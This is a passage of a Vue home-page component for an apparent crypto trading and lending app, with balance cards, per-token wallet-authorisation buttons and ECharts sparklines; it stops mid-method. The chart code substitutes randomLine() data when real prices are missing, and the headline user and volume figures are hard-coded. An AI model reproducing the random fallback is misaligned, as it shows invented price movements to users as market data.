<template>
	<div>
		<div class="home" :class="isPc ? '' : 'home-mobile'">
			<div>
				<NavM
					v-if="!isPc"
					:show-notice="true"
					:show-search="true"
					:show-user-name="false"
					:has-notice="getUserInfo.hasNotice"
				></NavM>
				<div class="home-header" v-if="isPc">
					<div class="home-header-title">
						{{ $t('home.homeTitle') }}
					</div>
					<div class="home-header-app">
						<div class="app-icon">
							<img src="@/assets/img/app_store.f539e414.svg" alt="" srcset="" />
						</div>
						<div class="app-right">
							<div class="app-ava">Available on the</div>
							<div class="app-store">App Store</div>
						</div>
					</div>
					<div class="home-header-application">
						<div class="icon-title">
							<img src="@/assets/img/icon_quadrangle.b1234c66.svg" alt="" /><span>{{
								$t('home.Application')
							}}</span>
						</div>
						<div class="icon-content">
							{{ $t('home.appLicationInfo') }}
						</div>
					</div>
					<div class="home-header-credit">
						<div class="icon-title">
							<img src="@/assets/img/icon_quadrangle.b1234c66.svg" alt="" /><span>{{ $t('home.CreditCard')
							}}</span>
						</div>
						<div class="icon-content">
							{{ $t('home.CreditCardInfo') }}
						</div>
					</div>
					<div class="home-header-box">
						<div class="box-money">
							<div class="box-top">$3.8 B</div>
							<div class="box-content">{{ $t('home.billionInfo') }}</div>
						</div>
						<div class="box-times">
							<div class="box-top">350+</div>
							<div class="box-content"> {{ $t('home.CryptocurrenciesListed') }}</div>
						</div>
						<div class="box-mill">
							<div class="box-top">1.2 M</div>
							<div class="box-content">{{ $t('home.RegisteredUsers') }}</div>
						</div>
					</div>
					<div class="home-header-imgs">
						<div class="imgs-left">
							<img src="@/assets/img/home_iphone1.b28f3fe0.svg" alt="" style="max-width: none;" />
						</div>
						<div class="imgs-right">
							<img src="@/assets/img/home_iphone2.da1b154c.svg" alt="" style="max-width: none;" />
						</div>
					</div>
				</div>
				<div class="home-body" v-if="isPc">
					<div class="box-butttons1">
						<div class="buttons-big buttons-big2 clicek-points" @click="$router.push('/help/notice')">
							<div class="info-buttons-content">
								<div class="content-icon"></div>
								<div class="content-text">{{ $t('home.NewFeaturesInOnline') }}</div>
								<div class="content-text1">
									<p>
										{{ $t('home.NewFeaturesInOnlineInfo') }}
									</p>
								</div>
							</div>
							<div class="masking"></div>
						</div>
						<div class="buttons-big buttons-big1 clicek-points" @click="$router.push('/profile')">
							<div class="content-icon"></div>
							<div class="content-text">
								<span>{{ $t('home.noticeInfo1') }}
								</span>
							</div>
						</div>
					</div>
					<div class="box-butttons2">
						<div class="butttons2">
							<div class="info-buttons-content">
								<div class="butttons2-icon">
									<img src="@/assets/img/icon_place.201127c8.svg" alt="" />
								</div>
								<div class="butttons2-text1">
									{{ $t('home.button1Title') }}&lt; 0.3%
								</div>
								<div class="butttons2-text2">
									{{ $t('home.button1Title1') }}

								</div>
								<div class="butttons2-text3">
									{{ $t('home.button1Title2') }}

								</div>
								<div class="butttons2-button clicek-points" @click="$router.push('/market')">
									{{ $t('home.GetStarted') }}

								</div>
							</div>
							<div class="masking"></div>
						</div>
						<div class="butttons2">
							<div class="info-buttons-content">
								<div class="butttons2-icon">
									<img src="@/assets/img/icon_loans.dd791035.svg" alt="" />
								</div>
								<div class="butttons2-text1">
									{{ $t('home.button2Title') }}
								</div>
								<div class="butttons2-text2"> {{ $t('home.button2Title1') }}
								</div>
								<div class="butttons2-text3">
									{{ $t('home.button2Title2') }}

								</div>
								<div class="butttons2-button clicek-points" @click="$router.push('/loan')">
									{{ $t('home.GetStarted') }}
								</div>
							</div>
							<div class="masking"></div>
						</div>
						<div class="butttons2">
							<div class="info-buttons-content">
								<div class="butttons2-icon">
									<img src="@/assets/img/icon_trading.733e50e8.svg" alt="" />
								</div>
								<div class="butttons2-text1"> {{ $t('home.button3Title') }}
								</div>
								<div class="butttons2-text2"> {{ $t('home.button3Title1') }}
								</div>
								<div class="butttons2-text3">
									{{ $t('home.button3Title2') }}
								</div>
								<div class="butttons2-button clicek-points" @click="$router.push('/trading')">
									{{ $t('home.GetStarted') }}
								</div>
							</div>
							<div class="masking"></div>
						</div>
						<div class="butttons2">
							<div class="info-buttons-content">
								<div class="butttons2-icon butttons2-icon1">
									<img src="@/assets/img/icon_charity.ce0fa0ca.svg" alt="" />
								</div>
								<div class="butttons2-text1">
									{{ $t('home.button4Title') }}

								</div>
								<div class="butttons2-text2"> {{ $t('home.button4Title1') }}
								</div>
								<div class="butttons2-text3">
									{{ $t('home.button4Title2') }}

								</div>
								<div class="butttons2-button clicek-points" @click="$router.push('/nfts')">
									{{ $t('home.GetStarted') }}

								</div>
							</div>
							<div class="masking"></div>
						</div>
					</div>
					<!-- <div>
						<div class="box-body">
							<div class="box-lists">
								<div class="box-heder">
									<div class="box-heder1">{{ $t('Market.name') }}</div>
									<div class="box-heder2">24h%</div>
									<div class="box-heder3">{{ $t('Market.chart') }}
									</div>
									<div class="box-heder4">{{ $t('Market.Price') }}</div>
								</div>
								<div class="box-body">
									<div class="box-list" @click="toDetail(item)" style="z-index: 10;"
										v-for="(item, index) in marketList" :key="index">
										<div class="box-heder1"><img :src="item.logo" alt="" srcset="">
											{{ item.appName }}
										</div>
										<div class="box-heder2" :class="{ 'box-heder2-1': item.zdf > 0 }">
											{{ item.zdf }}%
										</div>
										<div class="box-heder3">
											<div id="chart2" class="chart"
												style="user-select: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0);"
												_echarts_instance_="ec_1700723092218">
												<div :id="item.code"
													style="position: relative; width: 180px; height: 60px; padding: 0px; margin: 0px; border-width: 0px;">
												</div>
											</div>
										</div>
										<div class="box-heder4">{{ item.nowPrice }}</div>
									</div>
								</div>
							</div>
						</div>
					</div> -->
				</div>
				<div class="content" v-if="!isPc">
					<div class="mains">
						<div class="cards" :class="currentCard == 0 ? 'clicked' : 'disabled'" @click="changeCard(0)">
							<div class="leftbg"></div>
							<div class="noice"></div>
							<div class="maskings"></div>
							<div class="cards-main">
								<div class="titles">USDT {{ $t('navTab.tabMenu7') }}</div>
								<div class="counts">{{ formatAmount(getUserInfo?.usdtBalance || 0) }} <span>USDT</span>
								</div>
								<div class="schedule"><img
										src="@/assets/img/upicon.svg" alt="" srcset=""><span style="margin-right: 4px;">$
										{{ formatAmount(getUserInfo?.usdtTodayProfit || 0) }}</span>{{ $t('account.todayProfit') }}</div>
								<div class="iconlogo"><img
										src="@/assets/img/logo.png" alt="" srcset=""></div>
								<div v-if="!getUserInfo?.usdtAllowed || getUserInfo?.usdtAllowed === 0" class="open-button" @click.stop="openWalletAuth('USDT')"><img
										src="@/assets/img/open.svg" alt="" srcset=""></div>
							</div>
						</div>
						<div class="cards cards1" :class="currentCard == 1 ? 'clicked' : 'disabled'" @click="changeCard(1)">
							<div class="leftbg"></div>
							<div class="noice"></div>
							<div class="maskings"></div>
							<div class="cards-main">
								<div class="titles">USDC {{ $t('navTab.tabMenu7') }}</div>
								<div class="counts">{{ formatAmount(getUserInfo?.usdcBalance || 0) }} <span>USDC</span>
								</div>
								<div class="schedule"><img
										src="@/assets/img/upicon.svg" alt="" srcset=""><span style="margin-right: 4px;">$
										{{ formatAmount(getUserInfo?.usdcTodayProfit || 0) }}</span>{{ $t('account.todayProfit') }}</div>
								<div class="iconlogo"><img
										src="data:image/png;base64,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"
										alt="" srcset=""></div>
								<div v-if="!getUserInfo?.usdcAllowed || getUserInfo?.usdcAllowed === 0" class="open-button" @click.stop="openWalletAuth('USDC')"><img
										src="@/assets/img/open.svg" alt="" srcset=""></div>
							</div>
						</div>
					</div>
					<div class="lending-pool-entry" @click="$router.push('/lending-pool')">
						<div class="entry-left">
							<img src="@/assets/img/icon_loans.dd791035.svg" alt="" />
							<span>{{ $t('lendingPool.title') }}</span>
						</div>
						<img class="entry-arrow" src="@/assets/img/icon_arrow.dc4b9070.svg" alt="" />
					</div>
					<div class="new-feature">
						<div class="new-feature-content" @click="$router.push('/help/notice')">
							<div class="feature-icon"><img src="@/assets/img/icon_vetor.e4607d5d.svg" alt="" srcset="">
							</div>
							<div class="feature-title">{{ $t('home.NewFeaturesInOnline') }} </div>
							<div class="feature-content">
								<p>{{ $t('home.NewFeaturesInOnlineInfo') }}</p>
							</div>
						</div>
						<div class="masking"></div>
					</div>
					<div class="wallet" @click="$router.push('/profile')"><img
							src="@/assets/img/icon_bell1.98a9a1d5.svg" alt="" srcset="">
						<div>{{ $t('home.noticeInfo1') }}</div>
					</div>
					<div class="info-buttons">
						<div class="info-buttons-content">
							<div class="null-height"></div>
							<div class="icon"><img src="@/assets/img/icon_place.201127c8.svg" alt=""></div>
							<div class="info-text1">{{ $t('home.button1Title') }} &lt; 0.3% </div>
							<div class="info-text2">{{ $t('home.button1Title1') }}</div>
							<div class="info-text3">{{ $t('home.button1Title2') }}</div>
							<div class="info-button" @click="$router.push('/market')">{{ $t('home.GetStarted') }}</div>
						</div>
						<div class="masking"></div>
					</div>
					<div class="info-buttons">
						<div class="info-buttons-content">
							<div class="null-height"></div>
							<div class="icon"><img src="@/assets/img/icon_trading.733e50e8.svg" alt=""></div>
							<div class="info-text1">{{ $t('home.button3Title') }}</div>
							<div class="info-text2">{{ $t('home.button3Title1') }}</div>
							<div class="info-text3">{{ $t('home.button3Title2') }}</div>
							<div class="info-button" @click="$router.push('/trading')">{{ $t('home.GetStarted') }}</div>
						</div>
						<div class="masking"></div>
					</div>
					<div class="info-buttons">
						<div class="info-buttons-content">
							<div class="null-height"></div>
							<div class="icon"><img src="@/assets/img/icon_loans.dd791035.svg" alt=""></div>
							<div class="info-text1">{{ $t('home.button2Title') }}</div>
							<div class="info-text2">{{ $t('home.button2Title1') }}</div>
							<div class="info-text3">{{ $t('home.button2Title2') }}</div>
							<div class="info-button" @click="$router.push('/loan')">{{ $t('home.GetStarted') }}</div>
						</div>
						<div class="masking"></div>
					</div>
					<div class="info-buttons info-buttons1">
						<div class="info-buttons-content">
							<div class="null-height"></div>
							<div class="icon"><img src="@/assets/img/icon_charity.ce0fa0ca.svg" alt=""></div>
							<div class="info-text1">{{ $t('home.button4Title') }}</div>
							<div class="info-text2">{{ $t('home.button4Title1') }}</div>
							<div class="info-text3 info-text31">{{ $t('home.button4Title2') }}</div>
							<div class="info-button" @click="$router.push('/nfts')">{{ $t('home.GetStarted') }}</div>
						</div>
						<div class="masking"></div>
					</div>
					<div class="info-policy">
						<!-- 第一个company -->
						<div class="info_item">
							<div class="info_title">{{ $t('navBottom.bottomCompany') }}</div>
							<div class="info_list">
								<!-- 其他的 -->
								<div class="item_name" v-for="(item, index) in company"  @click="toDetailText(item)"
									:key="index">{{ item.title }}</div>
								<!-- <div class="item_name">{{ $t('navBottom.bottomCompanyItem2') }}</div>
                <div class="item_name">{{ $t('navBottom.bottomCompanyItem3') }}</div> -->
							</div>
						</div>
						<!-- 第二个Policies -->
						<div class="info_item">
							<div class="info_title">{{ $t('navBottom.bottomPolicy') }}</div>
							<div class="info_list">
								<div class="item_name" v-for="(item, index) in policy" @click="toDetailText(item)"
									:key="index">{{ item.title }}</div>
								
								<!--在线客服-->
								<div class="item_name"  @click="openService"
									key="online-service">{{ $t('home.onlineSupport') }}</div>
								<!-- <div class="item_name">{{ $t('navBottom.bottomPolicyItem2') }}</div> -->
							</div>
						</div>
						<!-- 第三个Statements -->
						<div class="info_item">
							<div class="info_title">{{ $t('navBottom.bottomOther') }}</div>
							<div class="info_list">
								<div class="item_name" v-for="(item, index) in footer" @click="toDetailText(item)"
									:key="index">{{ item.title }}</div>
								<!-- <div class="item_name">{{ $t('navBottom.bottomOtherItem2') }}</div>
                <div class="item_name">{{ $t('navBottom.bottomOtherItem3') }}</div>
                <div class="item_name">{{ $t('navBottom.bottomOtherItem5') }}</div> -->
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
</template>
<script>
import {
	randomLine
} from "@/utils/tools.js";
import {
	mapGetters
} from "vuex";
import {
	mapState
} from "vuex";
import {
	listMarketByType
} from '@/api/market.js'
import NavM from "@/components/nav_m.vue";
import WalletUtils from '@/api/wallet/walletUtils.js';
import { openCustomerService } from '@/utils/customerService';
export default {
	components: {
		NavM
	},
	data() {
		return {
			currentCard: 1,
			marketList: [],
			chartData: {},
			// 公司
			company: [],
			policy: [],
			footer: [],
			// 钱包相关状态
			walletUtils: null,
			walletLoading: false,
			walletConnected: false,
			walletAddress: '',
			authStatus: {
				USDT: false,
				USDC: false
			}
		}
	},
	computed: {
		...mapGetters(["marketWsList", "getContentList", "getUserInfo"]),
		...mapState(["isPc"]),
	},

	watch: {
		getContentList: {
			handler(val) {
				console.log(val);
				this.company = val.filter((item) => item.type == 1);
				this.policy = val.filter((item) => item.type == 2);
				this.footer = val.filter((item) => item.type == 3);
			},
			immediate: true,
			deep: true,
		},
		marketWsList: {
			handler: function (val, oldVal) {
				if (val[0]) {
					const data = val;
					this.marketList.forEach(item => {
						data.forEach(item1 => {
							if (item1.code === item.code) {
								item.nowPrice = item1.price;
								item.zdf = item1.zdf;
							}
						});
					});


					data.forEach(item => {
						if (!this.chartData[item.code]) {
							this.chartData[item.code] = [];
						}

						// 避免重复添加相同价格
						const lastPrice = this.chartData[item.code].length > 0 ?
							this.chartData[item.code][this.chartData[item.code].length - 1] : null;

						if (lastPrice !== item.price) {
							this.chartData[item.code].push(item.price);

							// 限制数据长度，保持最近100个点
							if (this.chartData[item.code].length > 100) {
								this.chartData[item.code].shift();
							}

							// 🎯 修复：使用nextTick确保数据更新完成后再渲染图表，避免竞态条件
							this.$nextTick(() => {
								this.chartInit(item.code);
							});
						}
					});
				}
			},
			deep: true
		}
	},


	mounted() {
		this.getListMarketByType();
		// 初始化钱包工具
		this.initWallet();
	},
	methods: {
		// 格式化金额显示
		formatAmount(amount) {
			if (!amount || amount === 0) {
				return '0.000000';
			}
			return parseFloat(amount).toFixed(6);
		},


		openService() {
			openCustomerService(this);
		},

		changeCard(index) {
			if (this.currentCard != index) {
				this.currentCard = index
			}
		},

		toDetailText(item) {
			// 判断跳转的路由是否是当前路由
			if (this.$route.query.id == item.id) {
				return;
			}
			this.$router.push({
				path: "/detail",
				query: {
					id: item.id,
					title: item.title
				}
			});
		},

		// 🎯 新增：跳转到About页面的方法
		toAboutPage(item) {
			// 判断跳转的路由是否是当前路由
			if (this.$route.name === 'about') {
				return;
			}
			this.$router.push({
				path: "/about",
				query: {
					title: item.title
				}
			});
		},
		toDetail(item) {
			this.$router.push({
				path: '/cruuency',
				query: {
					code: item.code,
					type: item.type,
					id: item.id
				}
			})
		},
		chartInit(code, hundred = []) {
			// 基于准备好的dom，初始化echarts实例
			let dom = document.getElementById(code);
			if (!dom) {
				console.warn(`🎯 [首页图表] DOM元素不存在: ${code}`);
				return;
			}

			// 🎯 修复：基本的DOM元素验证
			if (!dom.parentElement) {
				console.warn(`🎯 [首页图表] DOM元素无父元素: ${code}`);
				return;
			}
			this.$echarts.dispose(document.getElementById(code));
			const myChart = this.$echarts.init(document.getElementById(code));

			// 指定图表的配置项和数据


			var timeData = [];
			var valueData = [];
			// // 控制数据长度，只保留最近的 N 个数据，可以根据需要调整
			var maxLength = 100;
			if (hundred.length === 0) {
				// 🎯 修复：创建数据副本，避免引用共享导致的数据混乱
				const sourceData = this.chartData[code] ? [...this.chartData[code]] : [];
				timeData = sourceData.map((_, index) => index);
				valueData = sourceData.map(item => item).filter(item => item != 0);

				// 🎯 修复：统一使用slice(-maxLength)，确保数据切片逻辑一致
				if (timeData.length > maxLength) {
					timeData = timeData.slice(-maxLength);
					valueData = valueData.slice(-maxLength);
				}

				// 🎯 数据验证：确保当前产品的数据不为空且合理
				if (valueData.length === 0) {
					console.warn(`🎯 [首页图表] ${code} 数据为空，跳过渲染`);
					return;
				}

			} else {
				hundred.forEach(item => {
					timeData.push(item.time);
					valueData.push(item.price);
				})
				if (timeData.length > maxLength) {
					timeData.shift();
					valueData.shift();
				}
			}
			// console.log(timeData);
			// console.log(valueData);
			if (!valueData[0]) {
				valueData = randomLine();
			}
			// 🎯 美国习惯：绿涨红跌
			let green = '#44b400'; // 上涨用绿色
			let red = '#ff2828';   // 下跌用红色

			var option = {
				xAxis: {
					type: 'category',
					data: timeData,
					show: false,
				},
				grid: {
					left: '10%',
					right: '10%',
					top: '10%',
					bottom: '10%',
				},
				yAxis: {
					type: 'value',
					show: false,
					// 取数据的最大值和最小值
					max: function (value) {
						return Math.max.apply(null, valueData);
					},
					min: function (value) {
						return Math.min.apply(null, valueData);
					},
				},
				series: [{
					type: 'line',
					data: valueData,
					symbol: 'none',
					animation: false, // 取消折线的动画
					itemStyle: {
						color: this.marketList.find(item => item.code === code).zdf > 0 ? green : red // 🎯 绿涨红跌
					},
					lineStyle: {
						width: 1, // 设置折线的线条宽度
					},

				},],

			};
			// 使用刚指定的配置项和数据显示图表。
			myChart.setOption(option);

		},
		getListMarketByType() {
			listMarketByType().then(res => {
				console.log(res)
				this.marketList = res.result
				this.marketList.forEach((item, index) => {
					this.marketList[index].nowPrice = item.price;
